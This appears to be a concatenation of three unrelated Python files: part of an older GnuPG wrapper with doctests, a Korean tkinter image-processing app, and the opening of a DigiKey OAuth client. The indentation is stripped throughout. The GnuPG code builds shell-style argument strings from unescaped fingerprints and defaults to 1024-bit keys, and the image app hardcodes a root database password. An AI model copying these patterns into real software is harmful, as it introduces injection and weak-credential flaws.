>>> assert not print1 in pubkeys.fingerprints
>>> result = gpg.import_keys('foo')
>>> assert not result
>>> result = gpg.import_keys(pubkey1)
>>> pubkeys = gpg.list_keys()
>>> seckeys = gpg.list_keys(secret=True)
>>> assert not print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
>>> result = gpg.import_keys(seckey1)
>>> assert result
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
>>> assert print2 in pubkeys.fingerprints
"""
result = self.result_map['import'](self)
logger.debug('import_keys: %r', key_data[:256])
data = _make_binary_stream(key_data, self.encoding)
self._handle_io(['--import'], data, result, binary=True)
logger.debug('import_keys result: %r', result.__dict__)
data.close()
return result
def recv_keys(self, keyserver, *keyids):
"""Import a key from a keyserver
>>> import shutil
>>> shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> result = gpg.recv_keys('pgp.mit.edu', '3FF0DB166A7476EA')
>>> assert result
"""
result = self.result_map['import'](self)
logger.debug('recv_keys: %r', keyids)
data = _make_binary_stream("", self.encoding)
#data = ""
args = ['--keyserver', keyserver, '--recv-keys']
args.extend(keyids)
self._handle_io(args, data, result, binary=True)
logger.debug('recv_keys result: %r', result.__dict__)
data.close()
return result
def delete_keys(self, fingerprints, secret=False):
which='key'
if secret:
which='secret-key'
if _is_sequence(fingerprints):
fingerprints = ' '.join(fingerprints)
args = ['--batch --delete-%s "%s"' % (which, fingerprints)]
result = self.result_map['delete'](self)
p = self._open_subprocess(args)
self._collect_output(p, result, stdin=p.stdin)
return result
def export_keys(self, keyids, secret=False):
"export the indicated keys. 'keyid' is anything gpg accepts"
which=''
if secret:
which='-secret-key'
if _is_sequence(keyids):
keyids = ' '.join(['"%s"' % k for k in keyids])
args = ["--armor --export%s %s" % (which, keyids)]
p = self._open_subprocess(args)
# gpg --export produces no status-fd output; stdout will be
# empty in case of failure
#stdout, stderr = p.communicate()
result = self.result_map['delete'](self) # any result will do
self._collect_output(p, result, stdin=p.stdin)
logger.debug('export_keys result: %r', result.data)
return result.data.decode(self.encoding, self.decode_errors)
def list_keys(self, secret=False):
""" list the keys currently in the keyring
>>> import shutil
>>> shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> pubkeys = gpg.list_keys()
>>> assert print1 in pubkeys.fingerprints
>>> assert print2 in pubkeys.fingerprints
"""
which='keys'
if secret:
which='secret-keys'
args = "--list-%s --fixed-list-mode --fingerprint --with-colons" % (which,)
args = [args]
p = self._open_subprocess(args)
# there might be some status thingumy here I should handle... (amk)
# ...nope, unless you care about expired sigs or keys (stevegt)
# Get the response information
result = self.result_map['list'](self)
self._collect_output(p, result, stdin=p.stdin)
lines = result.data.decode(self.encoding,
self.decode_errors).splitlines()
valid_keywords = 'pub uid sec fpr sub'.split()
for line in lines:
if self.verbose:
print(line)
logger.debug("line: %r", line.rstrip())
if not line:
break
L = line.strip().split(':')
if not L:
continue
keyword = L[0]
if keyword in valid_keywords:
getattr(result, keyword)(L)
return result
def gen_key(self, input):
"""Generate a key; you might use gen_key_input() to create the
control input.
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> assert result
>>> result = gpg.gen_key('foo')
>>> assert not result
"""
args = ["--gen-key --batch"]
result = self.result_map['generate'](self)
f = _make_binary_stream(input, self.encoding)
self._handle_io(args, f, result, binary=True)
f.close()
return result
def gen_key_input(self, **kwargs):
"""
Generate --gen-key input per gpg doc/DETAILS
"""
parms = {}
for key, val in list(kwargs.items()):
key = key.replace('_','-').title()
parms[key] = val
parms.setdefault('Key-Type','RSA')
parms.setdefault('Key-Length',1024)
parms.setdefault('Name-Real', "Autogenerated Key")
parms.setdefault('Name-Comment', "Generated by gnupg.py")
try:
logname = os.environ['LOGNAME']
except KeyError:
logname = os.environ['USERNAME']
hostname = socket.gethostname()
parms.setdefault('Name-Email', "%s@%s" % (logname.replace(' ', '_'),
hostname))
out = "Key-Type: %s\n" % parms.pop('Key-Type')
for key, val in list(parms.items()):
out += "%s: %s\n" % (key, val)
out += "%commit\n"
return out
# Key-Type: RSA
# Key-Length: 1024
# Name-Real: ISdlink Server on %s
# Name-Comment: Created by %s
# Name-Email: isdlink@%s
# Expire-Date: 0
# %commit
#
#
# Key-Type: DSA
# Key-Length: 1024
# Subkey-Type: ELG-E
# Subkey-Length: 1024
# Name-Real: Joe Tester
# Name-Comment: with stupid passphrase
# Name-Email: [email protected]
# Expire-Date: 0
# Passphrase: abc
# %pubring foo.pub
# %secring foo.sec
# %commit
#
# ENCRYPTION
#
def encrypt_file(self, file, recipients, sign=None,
always_trust=False, passphrase=None,
armor=True, output=None, symmetric=False):
"Encrypt the message read from the file-like object 'file'"
args = ['--encrypt']
if symmetric:
args = ['--symmetric']
else:
args = ['--encrypt']
if not _is_sequence(recipients):
recipients = (recipients,)
for recipient in recipients:
args.append('--recipient "%s"' % recipient)
if armor: # create ascii-armored output - set to False for binary output
args.append('--armor')
if output: # write the output to a file with the specified name
if os.path.exists(output):
os.remove(output) # to avoid overwrite confirmation message
args.append('--output "%s"' % output)
if sign:
args.append('--sign --default-key "%s"' % sign)
if always_trust:
args.append("--always-trust")
result = self.result_map['crypt'](self)
self._handle_io(args, file, result, passphrase=passphrase, binary=True)
logger.debug('encrypt result: %r', result.data)
return result
def encrypt(self, data, recipients, **kwargs):
"""Encrypt the message contained in the string 'data'
>>> import shutil
>>> if os.path.exists("keys"):
... shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input(passphrase='foo')
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> result = gpg.encrypt("hello",print2)
>>> message = str(result)
>>> assert message != 'hello'
>>> result = gpg.decrypt(message)
>>> assert result
>>> str(result)
'hello'
>>> result = gpg.encrypt("hello again",print1)
>>> message = str(result)
>>> result = gpg.decrypt(message)
>>> result.status == 'need passphrase'
True
>>> result = gpg.decrypt(message,passphrase='bar')
>>> result.status in ('decryption failed', 'bad passphrase')
True
>>> assert not result
>>> result = gpg.decrypt(message,passphrase='foo')
>>> result.status == 'decryption ok'
True
>>> str(result)
'hello again'
>>> result = gpg.encrypt("signed hello",print2,sign=print1)
>>> result.status == 'need passphrase'
True
>>> result = gpg.encrypt("signed hello",print2,sign=print1,passphrase='foo')
>>> result.status == 'encryption ok'
True
>>> message = str(result)
>>> result = gpg.decrypt(message)
>>> result.status == 'decryption ok'
True
>>> assert result.fingerprint == print1
"""
data = _make_binary_stream(data, self.encoding)
result = self.encrypt_file(data, recipients, **kwargs)
data.close()
return result
def decrypt(self, message, **kwargs):
data = _make_binary_stream(message, self.encoding)
result = self.decrypt_file(data, **kwargs)
data.close()
return result
def decrypt_file(self, file, always_trust=False, passphrase=None,
output=None):
args = ["--decrypt"]
if output: # write the output to a file with the specified name
if os.path.exists(output):
os.remove(output) # to avoid overwrite confirmation message
args.append('--output "%s"' % output)
if always_trust:
args.append("--always-trust")
result = self.result_map['crypt'](self)
self._handle_io(args, file, result, passphrase, binary=True)
logger.debug('decrypt result: %r', result.data)
return result
|
myVision_without_np.py
|
import tkinter
from tkinter.simpledialog import *
from tkinter.filedialog import *
import math
import os
import os.path
import numpy as np
import struct
import matplotlib.pyplot as plt
import threading
import time
from PIL import Image, ImageFilter, ImageEnhance, ImageOps
import colorsys
import random
import tempfile
import pymysql
import csv
#######################
#### 클래스 선언부 ####
#######################
class Window(tkinter.Tk): # tkinter Tk를 상속
def __init__(self, H=500, W=500):
super(Window, self).__init__()
self.canvas = None
self.inImage = None
self.outImage = None
self.photo = None
self.H = H
self.W = W
self.panYN = N
self.viewX = W
self.viewY = H
self.sx = 0
self.sy = 0
self.ex = W-1
self.ey = H-1
def putSize(self, H: int, W: int):
self.H = H
self.W = W
def getSize(self):
return self.H, self.W
class Canvas(tkinter.Canvas): # tkinter Canvas를 상속
def __init__(self, window, height=500, width=500):
super(Canvas, self).__init__(window, height=height, width=width)
self.paper = None
self.H, self.W = window.getSize()
def putSize(self, H: int, W: int):
self.H = H
self.W = W
def getSize(self):
return self.H, self.W
class Paper:
def __init__(self, window: Canvas):
self.paper = None
self.H, self.W = window.getSize()
def putSize(self, H: int, W: int):
self.H = H
self.W = W
def getSize(self):
return self.H, self.W
class __Image:
def __init__(self, H=-1, W=-1):
self.H = H
self.W = W
self.filename = ''
self.mem = None
def putSize(self, H: int, W: int):
self.H = H
self.W = W
def getSize(self):
return self.H, self.W
def malloc(self, initValue: int = 0) -> list:
"""
이미지의 높이, 폭 값을 받아온 다음 메모리를 할당하여 list로 돌려준다.
:param initValue:
:return:
"""
if self.H == -1 or self.W == -1:
print("set H and W!! @ %s" % __class__)
exit(-1)
retMemory = []
for RGB in range(3):
retMemory.append([])
for i in range(self.H):
retMemory[RGB].append([])
for k in range(self.W):
retMemory[RGB][i].append(initValue)
self.mem = retMemory
class InImage(__Image):
def __init__(self, H=-1, W=-1):
super(InImage, self).__init__(H=H, W=W)
class OutImage(__Image):
def __init__(self, H=-1, W=-1):
super(OutImage, self).__init__(H=H, W=W)
#########################
#### 전역변수 선언부 ####
#########################
# image information
# mywin = MyWindow(H=500, W=500)
#
# mycan = MyCanvas(parent=mywin)
# mywin.canvas = mycan
#
# mypap = MyPaper(parent=mycan)
# mycan.paper = mypap
#
# inImage = InImage()
# outImage = OutImage()
# DB information
IP_ADDR = '192.168.56.106'
USER_NAME = 'root'
USER_PASS = '1234'
DB_NAME = 'BigData_DB'
CHAR_SET = 'utf8'
# tkinter wrapping variables
BOTTOM = tkinter.BOTTOM
X = tkinter.X
SUNKEN = tkinter.SUNKEN
W = tkinter.W
# tkinter wrapping Classes
Label = tkinter.Label
Menu = tkinter.Menu
# color information
R = 0
G = 1
B = 2
#####################
#### 함수 선언부 ####
#####################
def loadImage(window, fname: str) -> None:
photo = Image.open(fname) # PIL 객체
image = InImage()
## 메모리 확보
inW = photo.width
inH = photo.height
image.putSize(H=inH, W=inW)
image.malloc()
photoRGB = photo.convert('RGB')
for i in range(inH):
for k in range(inW):
r, g, b = photoRGB.getpixel((k, i))
image.mem[R][i][k] = r
image.mem[G][i][k] = g
image.mem[B][i][k] = b
window.photo = photo
return image
# 파일을 선택해서 메모리로 로딩하는 함수
def openImageColor(window):
filename = askopenfilename(parent=window,
filetypes=(("칼라 파일", "*.jpg;*.png;*.bmp;*.tif"), ("모든 파일", "*.*")))
if not filename:
return
window.inImage = loadImage(window, filename)
equalImage(window)
def saveImageColor(window):
outImage = window.outImage
if not outImage:
return
outArray= []
for i in range(outImage.H):
tmpList = []
for k in range(outImage.W):
tup = tuple([outImage.mem[R][i][k], outImage.mem[G][i][k], outImage.mem[B][i][k],])
tmpList.append(tup)
outArray.append(tmpList)
outArray = np.array(outArray)
savePhoto = Image.fromarray(outArray.astype(np.uint8), 'RGB')
saveFp = asksaveasfile(parent=window, mode='wb',
defaultextension='.', filetypes=(("그림 파일", "*.png;*.jpg;*.bmp;*.tif"), ("모든 파일", "*.*")))
if not saveFp:
return
savePhoto.save(saveFp.name)
print('Save~')
def displayImageColor(window):
canvas = window.canvas
outImage = window.outImage
if canvas: # 예전에 실행한 적이 있다.
canvas.destroy()
window.viewY, window.viewX = outImage.getSize() # H, W값 순서
step = 1
window.geometry(str(int(window.viewX * 1.2)) + 'x' + str(int(window.viewY * 1.2))) # 벽
canvas = Canvas(window, height=window.viewY, width=window.viewX)
window.canvas = canvas
paper = PhotoImage(height=window.viewY, width=window.viewX)
canvas.paper = paper
canvas.create_image(
(window.viewX // 2, window.viewY // 2), image=paper, state='normal')
## 성능 개선
rgbStr = '' # 전체 픽셀의 문자열을 저장
for i in np.arange(0, outImage.H, step):
tmpStr = ''
for k in np.arange(0, outImage.W, step):
i = int(i)
k = int(k)
r, g, b = outImage.mem[R][i][k], outImage.mem[G][i][k], outImage.mem[B][i][k]
tmpStr += ' #%02x%02x%02x' % (r, g, b)
rgbStr += '{' + tmpStr + '} '
paper.put(rgbStr)
# canvas.bind('<Button-1>', mouseClick)
# canvas.bind('<ButtonRelease-1>', mouseDrop)
canvas.pack(expand=1, anchor=CENTER)
# status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH))
# ###############################################
# ##### 컴퓨터 비전(영상처리) 알고리즘 함수 모음 #####
# ###############################################
# # 동일영상 알고리즘
def equalImage(window):
inImage = window.inImage
outImage = window.outImage
###### 메모리 할당 ################
outH, outW = inImage.getSize()
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
outImage.mem[RGB][i][k] = inImage.mem[RGB][i][k]
window.outImage = outImage
displayImageColor(window)
def addImageColor(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
## 메모리 확보
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
############################
### 진짜 컴퓨터 비전 알고리즘 ###
value = askinteger("밝게/어둡게", "값-->", minvalue=-255, maxvalue=255)
for RGB in range(3) :
for i in range(inImage.H) :
for k in range(inImage.W) :
if inImage.mem[RGB][i][k] + value > 255 :
outImage.mem[RGB][i][k] = 255
elif inImage.mem[RGB][i][k] + value < 0 :
outImage.mem[RGB][i][k] = 0
else :
outImage.mem[RGB][i][k] = inImage.mem[RGB][i][k] + value
#############################
window.outImage = outImage
displayImageColor(window)
def revImageColor(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
## 메모리 확보
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
############################
### 진짜 컴퓨터 비전 알고리즘 ###
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
outImage.mem[RGB][i][k] = 255 - inImage.mem[RGB][i][k]
#############################
window.outImage = outImage
displayImageColor(window)
def paraImageColor(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
## 메모리 확보
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
############################
### 진짜 컴퓨터 비전 알고리즘 ###\
LUT = [0 for _ in range(256)]
for input in range(256):
LUT[input] = int(255 - 255 * math.pow(input / 128 - 1, 2))
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
outImage.mem[RGB][i][k] = LUT[inImage.mem[RGB][i][k]]
#############################
window.outImage = outImage
displayImageColor(window)
def morphImageColor(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
## 추가 영상 선택
filename2 = askopenfilename(parent=window,
filetypes=(("칼라 파일", "*.jpg;*.png;*.bmp;*.tif"), ("모든 파일", "*.*")))
if not filename2:
return
inImage2 = loadImage(window, filename2)
## 메모리 확보
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
# 작은 쪽에 맞춤
if inImage.H > inImage2.H:
inImage.H = inImage2.H
if inImage.W > inImage2.W:
inImage.W = inImage2.W
import threading
import time
def morpFunc():
w1 = 1
w2 = 0
for _ in range(20):
for RGB in range(3) :
for i in range(inImage.H):
for k in range(inImage.W):
newValue = int(inImage.mem[RGB][i][k] * w1 + inImage2.mem[RGB][i][k] * w2)
if newValue > 255:
newValue = 255
elif newValue < 0:
newValue = 0
outImage.mem[RGB][i][k] = newValue
window.outImage = outImage
displayImageColor(window)
w1 -= 0.05;
w2 += 0.05
time.sleep(0.5)
threading.Thread(target=morpFunc).start()
def addSValuePillow(window):
photo = window.photo
inImage = window.inImage
## 중요! 코드. 출력영상 크기 결정 ##
value = askfloat("","0~1~10")
photo2 = photo.copy()
photo2 = ImageEnhance.Color(photo2)
photo2 = photo2.enhance(value)
## 중요! 코드. 출력영상 크기 결정 ##
outH = inImage.H
outW = inImage.W
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
## 임시 출력 --> 원 출력
for i in range(outH):
for k in range(outW):
r, g, b = photo2.getpixel((k, i))
outImage.mem[R][i][k] = r
outImage.mem[G][i][k] = g
outImage.mem[B][i][k] = b
displayImageColor(window)
def addSValueHSV(window):
## 입력 RGB --> 입력 HSV
# 메모리 확보
inImage = window.inImage
inH = inImage.H
inW = inImage.W
inImageHSV = InImage(H=inImage.H, W=inImage.W)
inImageHSV.malloc()
# RGB -> HSV
for i in range(inH):
for k in range(inW):
r, g, b = inImage.mem[R][i][k], inImage.mem[G][i][k], inImage.mem[B][i][k]
h, s, v = colorsys.rgb_to_hsv(r / 255, g / 255, b / 255)
inImageHSV.mem[0][i][k], inImageHSV.mem[1][i][k], inImageHSV.mem[2][i][k] = h, s, v
## 중요! 코드. 출력영상 크기 결정 ##
outH = inH
outW = inW
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
value = askfloat("", "-255~255") # -255 ~ 255
value /= 255
## HSV --> RGB
for i in range(outH):
for k in range(outW):
newS = inImageHSV.mem[1][i][k] + value
if newS < 0 :
newS = 0
elif newS > 1.0 :
newS = 1.0
h, s, v = inImageHSV.mem[0][i][k], newS, inImageHSV.mem[2][i][k]*255
r, g, b = colorsys.hsv_to_rgb(h, s, v)
outImage.mem[R][i][k], outImage.mem[G][i][k], outImage.mem[B][i][k] = int(r), int(g), int(b)
window.outImage = outImage
displayImageColor(window)
# 이진화 알고리즘
def bwImage(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
## 영상의 평균 구하기.
sumList = []
for RGB in range(3):
sumList.append(0)
for i in range(inImage.H):
for k in range(inImage.W):
sumList[RGB] += inImage.mem[RGB][i][k]
avg = [s // (inImage.W * inImage.H) for s in sumList]
for i in range(inImage.H):
for k in range(inImage.W):
avgVal = int(sum([inImage.mem[tmp][i][k] for tmp in range(3)]) / 3)
if avgVal > avg[RGB]:
newVal = 255
else:
newVal = 0
for RGB in range(3):
outImage.mem[RGB][i][k] = newVal
window.outImage = outImage
displayImageColor(window)
# 영상 축소 알고리즘 (평균변환)
def zoomOutImage2Color(window):
scale = askinteger("축소", "값-->", minvalue=2, maxvalue=16)
inImage = window.inImage
## 중요! 코드. 출력영상 크기 결정 ##
outH = inImage.H//scale
outW = inImage.W//scale
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
outImage.mem[RGB][i//scale][k//scale] += inImage.mem[RGB][i][k]
for i in range(outImage.H):
for k in range(outImage.W):
outImage.mem[RGB][i][k] //= (scale*scale)
window.outImage = outImage
displayImageColor(window)
# 영상 확대 알고리즘 (양선형 보간)
def zoomInImage2Color(window):
scale = askinteger("확대", "값-->", minvalue=2, maxvalue=8)
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
inH = inImage.H
inW = inImage.W
outH = inImage.H*scale
outW = inImage.W*scale
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
rH, rW, iH, iW = [0] * 4 # 실수위치 및 정수위치
x, y = 0, 0 # 실수와 정수의 차이값
C1,C2,C3,C4 = [0] * 4 # 결정할 위치(N)의 상하좌우 픽셀
for RGB in range(3):
for i in range(outH):
for k in range(outW):
rH = i / scale
rW = k / scale
iH = int(rH)
iW = int(rW)
x = rW - iW
y = rH - iH
if 0 <= iH < inH-1 and 0 <= iW < inW-1 :
C1 = inImage.mem[RGB][iH][iW]
C2 = inImage.mem[RGB][iH][iW+1]
C3 = inImage.mem[RGB][iH+1][iW+1]
C4 = inImage.mem[RGB][iH+1][iW]
newValue = C1*(1-y)*(1-x) + C2*(1-y)* x+ C3*y*x + C4*y*(1-x)
outImage.mem[RGB][i][k] = int(newValue)
window.outImage = outImage
displayImageColor(window)
# 영상 회전 알고리즘
def rotateImageColor(window):
angle = askinteger("회전", "값-->", minvalue=1, maxvalue=360)
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
radian = angle * math.pi / 180
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
xs = i
ys = k
xd = int(math.cos(radian) * xs - math.sin(radian) * ys)
yd = int(math.sin(radian) * xs + math.cos(radian) * ys)
if 0 <= xd < inImage.H and 0 <= yd < inImage.W:
outImage.mem[RGB][xd][yd] = inImage.mem[RGB][i][k]
window.outImage = outImage
displayImageColor(window)
# 영상 회전 알고리즘 - 중심, 역방향
def rotateImage2Color(window):
angle = askinteger("회전", "값-->", minvalue=1, maxvalue=360)
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
inH = inImage.H
inW = inImage.W
outH = inImage.H
outW = inImage.W
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
radian = angle * math.pi / 180
cx = inW//2
cy = inH//2
for RGB in range(3):
for i in range(outH) :
for k in range(outW) :
xs = i
ys = k
xd = int(math.cos(radian) * (xs-cx) - math.sin(radian) * (ys-cy)) + cx
yd = int(math.sin(radian) * (xs-cx) + math.cos(radian) * (ys-cy)) + cy
if 0 <= xd < outH and 0 <= yd < outW:
outImage.mem[RGB][xs][ys] = inImage.mem[RGB][xd][yd]
else:
outImage.mem[RGB][xs][ys] = 255
window.outImage = outImage
displayImageColor(window)
## 엠보싱 처리
def embossImageRGB(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
inH = inImage.H
inW = inImage.W
outH = inImage.H
outW = inImage.W
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
MSIZE = 3
mask = [ [-1, 0, 0],
[ 0, 0, 0],
[ 0, 0, 1] ]
## 임시 입력영상 메모리 확보
tmpInImage = InImage(H=inH + MSIZE - 1, W=inW + MSIZE - 1)
tmpInImage.malloc(initValue=127)
tmpOutImage = OutImage(H=outH, W=outW)
tmpOutImage.malloc()
## 원 입력 --> 임시 입력
for RGB in range(3):
for i in range(inH):
for k in range(inW):
tmpInImage.mem[RGB][i+MSIZE//2][k+MSIZE//2] = inImage.mem[RGB][i][k]
## 회선연산
for i in range(MSIZE//2, inH + MSIZE//2):
for k in range(MSIZE//2, inW + MSIZE//2):
# 각 점을 처리.
S = 0.0
for m in range(0, MSIZE):
for n in range(0, MSIZE):
S += mask[m][n]*tmpInImage.mem[RGB][i+m-MSIZE//2][k+n-MSIZE//2]
tmpOutImage.mem[RGB][i-MSIZE//2][k-MSIZE//2] = S
## 127 더하기 (선택)
for i in range(outH):
for k in range(outW):
tmpOutImage.mem[RGB][i][k] += 127
## 임시 출력 --> 원 출력
for i in range(outH):
for k in range(outW):
value = tmpOutImage.mem[RGB][i][k]
if value > 255 :
value = 255
elif value < 0 :
value = 0
outImage.mem[RGB][i][k] = int(value)
window.outImage = outImage
displayImageColor(window)
####################
#### 메인 코드부 ###
####################
if __name__ == "__main__":
win = Window(H=500, W=500)
win.geometry("500x500")
win.title("컴퓨터 비전(딥러닝 기법) ver 0.04")
can = Canvas(win)
win.canvas = can
pap = Paper(can)
can.paper = pap
inImage = InImage()
win.inImage = inImage
outImage = OutImage()
win.outImage = outImage
status = Label(win, text='이미지 정보:', bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
mainMenu = Menu(win)
win.config(menu=mainMenu)
fileMenu = Menu(mainMenu)
mainMenu.add_cascade(label="파일", menu=fileMenu)
fileMenu.add_command(label="파일 열기", command=lambda: openImageColor(win))
fileMenu.add_separator()
fileMenu.add_command(label="파일 저장", command=lambda: saveImageColor(win))
comVisionMenu1 = Menu(mainMenu)
mainMenu.add_cascade(label="화소점 처리", menu=comVisionMenu1)
comVisionMenu1.add_command(label="덧셈/뺄셈", command=lambda: addImageColor(win))
comVisionMenu1.add_command(label="반전하기", command=lambda: revImageColor(win))
comVisionMenu1.add_command(label="파라볼라", command=lambda: paraImageColor(win))
comVisionMenu1.add_separator()
comVisionMenu1.add_command(label="모핑", command=lambda: morphImageColor(win))
comVisionMenu1.add_separator()
comVisionMenu1.add_command(label="채도조절(Pillow)", command=lambda: addSValuePillow(win))
comVisionMenu1.add_command(label="채도조절(HSV)", command=lambda: addSValueHSV(win))
comVisionMenu2 = Menu(mainMenu)
mainMenu.add_cascade(label="통계", menu=comVisionMenu2)
comVisionMenu2.add_command(label="이진화", command=lambda: bwImage(win))
comVisionMenu2.add_command(label="축소(평균변환)", command=lambda: zoomOutImage2Color(win))
comVisionMenu2.add_command(label="확대(양선형보간)", command=lambda: zoomInImage2Color(win))
comVisionMenu2.add_separator()
# comVisionMenu2.add_command(label="히스토그램", command=histoImage)
# comVisionMenu2.add_command(label="히스토그램(내꺼)", command=histoImage2)
# comVisionMenu2.add_command(label="명암대비", command=stretchImage)
# comVisionMenu2.add_command(label="End-In탐색", command=endinImage)
# comVisionMenu2.add_command(label="평활화", command=equalizeImage)
comVisionMenu3 = Menu(mainMenu)
mainMenu.add_cascade(label="기하학 처리", menu=comVisionMenu3)
# comVisionMenu3.add_command(label="상하반전", command=upDownImageColor)
# comVisionMenu3.add_command(label="이동", command=moveImage)
# comVisionMenu3.add_command(label="축소", command=zoomOutImageColor)
# comVisionMenu3.add_command(label="확대", command=zoomInImageColor)
comVisionMenu3.add_command(label="회전1", command=lambda: rotateImageColor(win))
comVisionMenu3.add_command(label="회전2(중심,역방향)", command=lambda: rotateImage2Color(win))
comVisionMenu4 = Menu(mainMenu)
mainMenu.add_cascade(label="화소영역 처리", menu=comVisionMenu4)
comVisionMenu4.add_command(label="엠보싱(RGB)", command=lambda: embossImageRGB(win))
# comVisionMenu4.add_command(label="엠보싱(Pillow제공)", command=embossImagePillow)
# comVisionMenu4.add_command(label="엠보싱(HSV)", command=embossImageHSV)
# comVisionMenu4.add_separator()
# comVisionMenu4.add_command(label="블러링(RGB)", command=blurrImageRGB)
#
# comVisionMenu5 = Menu(mainMenu)
# mainMenu.add_cascade(label="기타 입출력", menu=comVisionMenu5)
# comVisionMenu5.add_command(label="MySQL에서 불러오기", command=loadMysql)
# comVisionMenu5.add_command(label="MySQL에 저장하기", command=saveMysql)
# comVisionMenu5.add_separator()
# comVisionMenu5.add_command(label="CSV 열기", command=openCSV)
# comVisionMenu5.add_command(label="CSV로 저장", command=saveCSV)
# comVisionMenu5.add_separator()
# comVisionMenu5.add_command(label="엑셀 열기", command=openExcel)
# comVisionMenu5.add_command(label="엑셀로 저장", command=saveExcel)
# comVisionMenu5.add_command(label="엑셀 아트로 저장", command=saveExcelArt)
win.mainloop()
|
dkinterface.py
|
import threading
import configparser
from datetime import datetime
import webbrowser
import http.server
import socketserver
from urllib.parse import parse_qs, urlparse, urlencode
import requests
import ssl
AUTH_RESP_PORT = 4443
class DKAPIInterface:
def __init__(self, auth_complete_callback=None):
# constants
self.CONFIG_FILENAME = "AppData/inventory.ini"
self.CLIENT_ID = ""
self.CLIENT_SECRET = ""
'''
# sandbox
self.REDIRECT_URL = "http://127.0.0.1:{}".format(AUTH_RESP_PORT)
self.AUTH_URL = "https://sandbox-api.digikey.com/v1/oauth2/authorize?"\
"response_type=code&"\
"client_id={}&"\
"redirect_uri={}".format(CLIENT_ID, REDIRECT_URL)
self.ACCESS_URL = "https://sandbox-api.digikey.com/v1/oauth2/token" # same for access and refresh tokens
self.PRODUCT2DBARCODE_URL = "https://sandbox-api.digikey.com/Barcoding/v3/Product2DBarcodes/"
'''
self.REDIRECT_URL = "https://127.0.0.1:{}".format(AUTH_RESP_PORT) # production
self.AUTH_URL = "https://api.digikey.com/v1/oauth2/authorize?" \
"response_type=code&" \
"client_id={}&" \
"redirect_uri={}".format(self.CLIENT_ID, self.REDIRECT_URL)
self.ACCESS_URL = "https://api.digikey.com/v1/oauth2/token" # same for access and refresh tokens
self.PRODUCT2DBARCODE_URL = "https://api.digikey.com/Barcoding/v3/Product2DBarcodes/"
# http server objects to serve the redirect URI at localhost
self.http_handler = None
self.http_thread = None
self.httpd = None
# tokens for the API
self.access_token = ""
self.refresh_token = ""
self.access_token_expiry = 0
self.refresh_token_expiry = 0
self.auth_valid = False
self.refresh_valid = False
# try to read the config file
self.config = configparser.ConfigParser()
open_cfg_ret = self.config.read(self.CONFIG_FILENAME)
# returns a list. If the file exists, the list contains the file name, nothing otherwise.
config_len = len(open_cfg_ret)
if config_len == 0:
self.prompt_app_creation()
if config_len > 0:
# config file is present. Will assume it has the correct content
try: # test for the client credentials
self.CLIENT_ID = self.config["client_cred"]["id"]
self.CLIENT_SECRET = self.config["client_cred"]["secret"]
except KeyError:
self.prompt_app_creation()
self.load_tokens()
# check if the tokens are valid
self.check_access_token()
# callback that gets called when the user authorisation is complete
self.auth_complete_callback = auth_complete_callback
def prompt_app_creation(self):
print("Admin: please create a DigiKey application to use this program. Refer to README for details.")
input("Press Enter to Exit..")
exit(0)
def load_tokens(self):
self.access_token = self.config["tokens"]["access_token"]
self.refresh_token = self.config["tokens"]["refresh_token"]
